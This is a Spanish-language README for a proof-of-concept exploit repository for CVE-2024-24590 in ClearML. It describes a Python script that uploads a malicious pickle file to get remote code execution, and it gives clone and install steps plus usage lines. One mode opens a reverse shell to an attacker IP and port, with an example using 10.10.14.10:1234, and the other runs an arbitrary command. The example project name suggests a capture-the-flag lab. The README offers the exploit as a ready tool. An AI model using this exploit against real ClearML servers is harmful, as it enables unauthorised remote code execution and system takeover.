
CVE-2024-24590 ClearML RCE&CMD POC
Este repositorio contiene un script de exploit en Python para CVE-2024-24590. El script está diseñado para subir un archivo pickle malicioso a ClearML, que ejecuta una reverse shell o un comando personalizado.
Clona el repositorio:
git clone https://github.com/diegogarciayala/CVE-2024-24590-ClearML-RCE-CMD-POC.git
cd CVE-2024-24590-ClearML-RCE-CMD-POC
Instala el SDK de ClearML:
pip install clearml
clearml-init
El script soporta dos modos de operación: default y cmd.
En este modo, debes proporcionar la IP y el puerto del atacante para establecer una reverse shell.
python3 exploit.py default <project_name> <task_name> <attacker_ip> <attacker_port>
En este modo, puedes proporcionar un comando personalizado para que se ejecute.
python3 exploit.py cmd <project_name> <task_name> --cmd "<your_command>"
python3 exploit.py default "Black Swan" "pwned4" "10.10.14.10" "1234"
python3 exploit.py cmd "Black Swan" "pwned4" --cmd "touch /tmp/shell.sh"